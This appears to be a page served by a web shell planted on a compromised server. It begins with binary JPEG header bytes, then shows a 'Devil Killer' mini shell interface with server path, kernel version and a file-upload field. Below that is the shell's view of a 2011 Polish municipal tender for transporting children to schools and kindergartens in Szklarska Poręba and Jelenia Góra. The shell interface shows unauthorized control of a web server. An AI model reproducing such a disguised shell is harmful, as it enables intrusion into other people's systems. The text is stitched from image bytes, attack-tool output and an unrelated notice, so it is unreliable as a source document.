JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111219/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111219/335367-N-2011.html

<p class="kh_header"><b>Szklarska Poręba: Świadczenie usług transportowych  w zakresie przewozu dzieci i uczniów 
                      zamieszkałych na terenie miasta Szklarska Poręba  do:       
                                               
      - przedszkoli samorządowych na terenie Szklarskiej Poręby ;                                       
      - przedszkola integracyjnego i placówek oświatowych na terenie  Jeleniej Góry i Szklarskiej Poręby</b><br>
<b>Numer ogłoszenia: 335367 - 2011; data zamieszczenia: 19.12.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Szklarska Poręba , ul. M. Buczka 2, 58-580 Szklarska Poręba, woj. dolnośląskie, tel. 075 7547712, faks 075 7547724.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług transportowych  w zakresie przewozu dzieci i uczniów 
                      zamieszkałych na terenie miasta Szklarska Poręba  do:       
                                               
      - przedszkoli samorządowych na terenie Szklarskiej Poręby ;                                       
      - przedszkola integracyjnego i placówek oświatowych na terenie  Jeleniej Góry i Szklarskiej Poręby.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> a.	Świadczenie usług transportowych w zakresie przewozu dzieci niepełnosprawnych intelektualnie  zamieszkałych  na terenie miasta Szklarska Poręba  do placówek oświatowych   w Jeleniej Górze  i z powrotem , we wszystkie dni nauki szkolnej 
 
     Miejsce dowozu 

1)	   Zespół Szkół i Placówek Specjalnych  - Szkoła Podstawowa     Jelenia  Góra,  ul. Wolności 117
                                                                                                                            liczba dzieci   -   3

2)	Zespół Szkół i Placówek Specjalnych                                                Jelenia  Góra,  ul. Kruszwicka 3 
                                                                                                                                  liczba dzieci   -   3

3)	Zespół Szkół i Placówek Specjalnych                                                Jelenia  Góra,  ul. Grottgera 1                      
                                                                                                                                  liczba dzieci    -  1

4)	Gimnazjum Nr 3 im. Janusza Kusocińskiego                                   Jelenia  Góra,  ul. Grunwaldzka 64 a. 
                                                                                                                                  liczba dzieci   -  1

5)	Miejskie Przedszkole Integracyjne Nr 14                                         Jelenia  Góra,  ul. Junaków 2 
                                                                                                                                   liczba dzieci  -  1

      Trasa przejazdu    -  70 km   (łącznie) 

Liczba osób  objęta przewozem :     9 dzieci  + 1  opiekun (zapewniony przez Gminę ) .
Rozpoczęcie zajęć szkolnych:   godzina  08:00
Zakończenie zajęć szkolnych:  godzina   14:15
b.  świadczenie usług transportowych w zakresie przewozu dzieci do przedszkoli samorządowych na terenie Szklarskiej Poręby  

     Trasa przejazdu   -  17,4 km (łącznie)  
Liczba osób  objęta przewozem :     14  dzieci  + 1  opiekun (zapewniony przez Gminę ) .Rozpoczęcie zajęć :     godzina  08:00
      Zakończenie zajęć:     odbiór dzieci z  Przedszkola Samorządowego  Nr 2   - ok. godziny  15:30
                                             odbiór dzieci z  Przedszkola Samorządowego  Nr 1   - ok. godziny  15:40 
c. świadczenie usług transportowych w zakresie dowozu i przywozu uczniów szkół podstawowych i gimnazjów na terenie Szklarskiej Poręby , we wszystkie dni nauki szkolnej 

     Trasa przejazdu   -  22,4 km   (łącznie tj. do- i z- )  Rozpoczęcie zajęć :     godzina  08:00

      Zakończenie zajęć szkolnych: 

 I Kurs  -   godz.  13:40  -  Szkoła Podstawowa Nr  1,   ul. 1.Maja 32   
II Kurs  -  godz.   14:40  -  Szkoła Podstawowa Nr  5,   ul. 11.Listopada 2  

Liczba osób  objęta przewozem :   86 dzieci + 1  opiekun (zapewniony przez Gminę ) 
 w tym :    44 dzieci    ze Szkoły Podstawowej Nr 1, 
                  28 dzieci    ze Szkoły Podstawowej Nr 5
                    14  z Gimnazjum 
1	opiekun.
2	

 W przypadku wolnych miejsc   spowodowanych absencją uczniów  - przewoźnik ma prawo zabrać  , z tych miejsc przystankowych, dodatkowych pasażerów za pobraniem opłaty za przejazd . Ilość przewożonych dodatkowo pasażerów nie może się odbyć kosztem komfortu przejazdu uczniów..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający  przewiduje zamówienie uzupełniające zgodne z przedmiotem zamówienia podstawowego, które może być udzielone  w okresie 3 lat  od udzielenia zamówienia podstawowego , dotychczasowemu wykonawcy usługi  , i  którego wartość  nie przekroczy  15% wartości zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 60.11.20.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 29.06.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie jest wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi   posiadać  stosowną  licencję na wykonywanie krajowego transportu drogowego osób,        z datą ważności co najmniej do 30.06.2012r. którą  w formie kopii poświadczonej  prze wykonawcę   _za zgodność  z oryginałem_załącza do oferty.
 Ocena spełnienia warunku udziału w postępowaniu będzie dokonana na podstawie dokumentu według formuły: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- w oparciu o złożone  Oświadczenie    wg  Załącznika Nr 2 - Wzór oświadczenia o spełnieniu warunków udziału w postępowaniu, o  których mowa  w art.22.ust.1 ustawy z 29.01.2004-Prawo zam. publicznych .  Ocena spełnienia warunku udziału w postępowaniu będzie dokonana na podstawie dokumentu według formuły: spełnia - nie spełnia. Wykonawca może polegać na wiedzy i doświadczeniu innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. 

Wykonawca w takiej sytuacji jest zobowiązany udowodnić Zamawiającemu , iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu niniejszego zamówienia- Załącznik Nr 4 do IDW .W przypadku wspólnego ubiegania się wykonawców o udzielenie niniejszego zamówienia oceniana będzie ich łączna wiedza i doświadczenie - w tym celu dokumenty ma obowiązek złożyć ten lub ci z Wykonawców, którzy w imieniu wszystkich wykazywać będą spełnianie warunku.

Wykonawca lub wykonawcy ubiegający się wspólnie o udzielenie zamówienia( konsorcjum, spółka cywilna)  wraz z ofertą złoży lub złożą  oświadczenie o spełnieniu warunków udziału   w postępowaniu ( art.22 ust. 1 u.p.z.p.)    - Załącznik Nr 2 do IDW</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- w oparciu o złożone  Oświadczenie    wg  Załącznika Nr 2 - Wzór oświadczenia o spełnieniu warunków udziału w postępowaniu, o  których mowa  w art.22.ust.1 ustawy z 29.01.2004-Prawo zam. publicznych . Wykonawca może polegać na potencjale technicznym innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. 

Wykonawca w takiej sytuacji jest zobowiązany udowodnić Zamawiającemu , iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu niniejszego zamówienia- Załącznik Nr 4 do IDW .W przypadku wspólnego ubiegania się wykonawców o udzielenie niniejszego zamówienia oceniany będzie ich łączny potencjał techniczny  - w tym celu dokumenty ma obowiązek złożyć ten lub ci z Wykonawców, którzy w imieniu wszystkich wykazywać będą spełnianie warunku.

Wykonawca lub wykonawcy ubiegający się wspólnie o udzielenie zamówienia( konsorcjum, spółka cywilna)  wraz z ofertą złoży lub złożą  oświadczenie o spełnieniu warunków udziału   w postępowaniu ( art.22 ust. 1 u.p.z.p.)    - Załącznik Nr 2 do IDW



Ocena spełnienia warunku udziału w postępowaniu będzie dokonana na podstawie dokumentu według formuły: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- w oparciu o złożone  Oświadczenie    wg  Załącznika Nr 2 - Wzór oświadczenia o spełnieniu warunków udziału w postępowaniu, o  których mowa  w art.22.ust.1 ustawy z 29.01.2004-Prawo zam. publicznych . Wykonawca może polegać na osobach zdolnych do wykonania zamówienia   innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. 

Wykonawca w takiej sytuacji jest zobowiązany udowodnić Zamawiającemu , iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu niniejszego zamówienia- Załącznik Nr 4 do IDW .W przypadku wspólnego ubiegania się wykonawców o udzielenie niniejszego zamówienia oceniany będzie ich łączny potencjał kadrowy  - w tym celu dokumenty ma obowiązek złożyć ten lub ci z Wykonawców, którzy w imieniu wszystkich wykazywać będą spełnianie warunku.

Wykonawca lub wykonawcy ubiegający się wspólnie o udzielenie zamówienia( konsorcjum, spółka cywilna)  wraz z ofertą złoży lub złożą  oświadczenie o spełnieniu warunków udziału   w postępowaniu ( art.22 ust. 1 u.p.z.p.)    - Załącznik Nr 2 do IDW</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a)  w oparciu o złożone  Oświadczenie    wg  Załącznika Nr 2 - Wzór oświadczenia o spełnieniu warunków  udziału w postępowaniu, o  których mowa  w art.22.ust.1 ustawy z 29.01.2004-Prawo zam. publicznych  

b)	popartej posiadaniem opłaconej polisy, a w przypadku jej braku innego dokumentu potwierdzającego ubezpieczenie od odpowiedzialności cywilnej  w zakresie prowadzonej działalności  związanej                       z przedmiotem zamówienia:  
      -na sumę gwarancyjną nie mniejszą niż  50 000 zł - w przypadku składania oferty na 1 część zamówienia; 
        -na sumę gwarancyjną nie mniejszą niż  100 000 zł - w przypadku składania oferty na dwie lub więcej  część zamówienia . 

W przypadku wykazania sumy ubezpieczenia wykazanej w walucie obcej, Zamawiający przyjmie, iż sumą ubezpieczenia jest iloczyn wykazanej sumy ubezpieczenia i średniego kursu tej waluty, określonego przez Narodowy Bank Polski  na dzień 30 listopada 2011 r. 

Do przedłożenia polisy lub innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od
odpowiedzialności cywilnej  zostanie wezwany wykonawca , którego oferta uznana zostanie za najkorzystniejszą   -  przed podpisaniem umowy.

Wykonawca może polegać na zasobach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. 

Wykonawca w takiej sytuacji jest zobowiązany udowodnić Zamawiającemu , iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu niniejszego zamówienia- Załącznik Nr 4 do IDW .W przypadku wspólnego ubiegania się wykonawców o udzielenie niniejszego zamówienia oceniany będzie ich łączny potencjał ekonomiczny i finansowy  - w tym celu dokumenty ma obowiązek złożyć ten lub ci z Wykonawców, którzy w imieniu wszystkich wykazywać będą spełnianie warunku.

Wykonawca lub wykonawcy ubiegający się wspólnie o udzielenie zamówienia( konsorcjum, spółka cywilna)  wraz z ofertą złoży lub złożą  oświadczenie o spełnieniu warunków udziału   w postępowaniu ( art.22 ust. 1 u.p.z.p.)    - Załącznik Nr 2 do IDW.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.szklarskaporeba.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> nieodplatnie ze strony internetowej Miasta.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.12.2011 godzina 12:00, miejsce: siedziba Zamawiającego_ Urząd Miasta Szklarska Poręba, 58-580 Szklarska Poręba, ul. M. Buczka 2 lub bezpośrednio w Biurze Obsługi Interesanta- adres jw., parter..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> a.	Świadczenie usług transportowych w zakresie przewozu dzieci niepełnosprawnych intelektualnie  zamieszkałych  na terenie miasta Szklarska Poręba  do placówek oświatowych   w Jeleniej Górze  i z powrotem , we wszystkie dni nauki szkolnej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Miejsce dowozu 

1)	   Zespół Szkół i Placówek Specjalnych  - Szkoła Podstawowa     Jelenia  Góra,  ul. Wolności 117
                                                                                                                            liczba dzieci   -   3

2)	Zespół Szkół i Placówek Specjalnych                                                Jelenia  Góra,  ul. Kruszwicka 3 
                                                                                                                                  liczba dzieci   -   3

3)	Zespół Szkół i Placówek Specjalnych                                                Jelenia  Góra,  ul. Grottgera 1                      
                                                                                                                                  liczba dzieci    -  1

4)	Gimnazjum Nr 3 im. Janusza Kusocińskiego                                   Jelenia  Góra,  ul. Grunwaldzka 64 a. 
                                                                                                                                  liczba dzieci   -  1

5)	Miejskie Przedszkole Integracyjne Nr 14                                         Jelenia  Góra,  ul. Junaków 2 
                                                                                                                                   liczba dzieci  -  1

      Trasa przejazdu    -  70 km   (łącznie) 

    Szklarska Poręba - Jelenia Góra :  

    ul. 1 Maja (Kiosk _U Piotrusia_)  - ul. Osiedle Huty -  ul. Demokratów - Szklarska Poręba Dolna Kościół    
    - ul.  Grunwaldzka 64a  -  ul. Grottgera 1 -  ul. Wolności 117 -   ul. Kruszwicka 3 -   ul. Junaków 2

    lub

   ul. 1 Maja (Kiosk _U Piotrusia_)  - ul. Osiedle Huty -  ul. Demokratów -Szklarska Poręba Dolna Kościół    
  -ul. Junaków 2  -  ul. Kruszwicka 3  - ul. Wolności 117-  ul. Grottgera 1 -  ul. Grunwaldzka 64a

    Jelenia Góra   -   Szklarska Poręba :

    ul. Grunwaldzka 64a  - ul. Grottgera 1- ul. Wolności 117-   ul. Kruszwicka 3 - ul. Junaków 2       -Szklarska Poręba Dolna Kościół - ul.Demokratów- ul. Osiedle Huty -  ul. 1 Maja (Kiosk _U Piotrusia_).     

Rozpoczęcie zajęć szkolnych:   godzina  08:00
Zakończenie zajęć szkolnych:  godzina   14:15
Liczba osób  objęta przewozem :     9 dzieci  + 1  opiekun (zapewniony przez Gminę ).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.11.20.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.06.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> b.  świadczenie usług transportowych w zakresie przewozu dzieci do przedszkoli samorządowych na terenie Szklarskiej Poręby.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Trasa przejazdu   -  17,4 km (łącznie)  

RANO:
z - :
Szklarska Poręba Dolna (Lipa Sądowa)       			  - liczba dzieci - 3;
Szklarska Poręba Dolna (PKP)                         		   -liczba dzieci - 2;
Szklarska Poręba Dolna (Kościół)                   		   -liczba dzieci - 5;
Szklarska Poręba Średnia (Ośrodek Tęcza)  		   -liczba dzieci - 2;
Szklarska Poręba Średnia (Sklep u Marka)   		  - liczba dzieci - 1;
Szklarska Poręba Średnia (Smażalnia Ryb) 			  - liczba dzieci - 1;
do - :
Przedszkole Samorządowe Nr 1, ul. Sikorskiego 12 	  - liczba dzieci wysiadających - 8;
Przedszkole Samorządowe Nr 2, ul. Osiedle Huty 1                 - liczba dzieci wysiadających - 6;

PO POŁUDNIU:
z- :
Przedszkole Samorządowe Nr 2, ul. Osiedle Huty 1               -  liczba dzieci wsiadających - 6;
Przedszkole Samorządowe Nr 1, ul. Sikorskiego 12                - liczba dzieci wsiadających -  8;
      do- :
Szklarska Poręba Średnia (Smażalnia Ryb) 			 -  liczba dzieci - 1;
Szklarska Poręba Średnia (Sklep u Marka) 			 -  liczba dzieci - 1;
Szklarska Poręba Średnia (Ośrodek Tęcza) 			 -  liczba dzieci - 2 ;
Szklarska Poręba Dolna (Kościół) 				 -  liczba dzieci - 5;
Szklarska Poręba Dolna (PKP)     				 - liczba dzieci  - 2;
Szklarska Poręba Dolna (Lipa Sądowa) 			 - liczba dzieci  - 3.


Rozpoczęcie zajęć :     godzina  08:00
      Zakończenie zajęć:     odbiór dzieci z  Przedszkola Samorządowego  Nr 2   - ok. godziny  15:30
                                             odbiór dzieci z  Przedszkola Samorządowego  Nr 1   - ok. godziny  15:40 

Liczba osób  objęta przewozem :     14  dzieci  + 1  opiekun (zapewniony przez Gminę ).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.11.20.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.06.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> c. świadczenie usług transportowych w zakresie dowozu i przywozu uczniów szkół podstawowych i gimnazjów na terenie Szklarskiej Poręby , we wszystkie dni nauki szkolnej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Trasa przejazdu   -  22,4 km   (łącznie tj. do- i z- )  . Szklarska Poręba Dolna Kościół                                  -  15 dzieci   -  Szkoła Podst. Nr 1 , ul.  1. Maja 32
                                                                                       -     9 dzieci   -  Szkoła Podst. Nr  5 , ul. 11.Listopada 2
                                                                                       -   10 dzieci   -  Gimnazjum , ul. Obrońców Pokoju 17 ;



Szklarska Poręba Średnia (Ośrodek Tęcza)                -   3  dzieci     -  Szkoła Podst. Nr 1 , ul.  1. Maja 32
                                                                                        -   5  dzieci     -  Szkoła Podst. Nr  5 , ul. 11.Listopada 2
                                                                                        -   1 dziecko   -  Gimnazjum, ul. Obrońców Pokoju 17 ;


 Szklarska Poręba Górna (Tunel)                                  -   1 dziecko  - Szkoła Podst. Nr  5 , ul. 11.Listopada 2 ;
	


Szklarska Poręba Górna Biała Dolina (Demokratów)   -   19 dzieci  - Szkoła Podst. Nr 1 , ul.  1. Maja 32 
                                                                                             - 11 dzieci -  Szkoła Podst. Nr  5 , ul. 11.Listopada 2
                                                                                              -  3 dzieci  -  Gimnazjum , ul. Obrońców Pokoju 17 ;

Szklarska Poręba Huta (przystanek Osiedle Huty)      -  7  dzieci    -    Szkoła Podst. Nr 1 , ul.  1. Maja 32                                                                                                                                     
                                                                                           -  2  dzieci    - Szkoła Podst. Nr  5 , ul. 11.Listopada 2.

Rozpoczęcie zajęć :     godzina  08:00

      Zakończenie zajęć szkolnych: 

 I Kurs  -   godz.  13:40  -  Szkoła Podstawowa Nr  1,   ul. 1.Maja 32   
II Kurs  -  godz.   14:40  -  Szkoła Podstawowa Nr  5,   ul. 11.Listopada 2  

Liczba osób  objęta przewozem :   86 dzieci + 1  opiekun (zapewniony przez Gminę ) 
 w tym :    44 dzieci    ze Szkoły Podstawowej Nr 1, 
                  28 dzieci    ze Szkoły Podstawowej Nr 5
                    14  z Gimnazjum 
1	opiekun.
2	

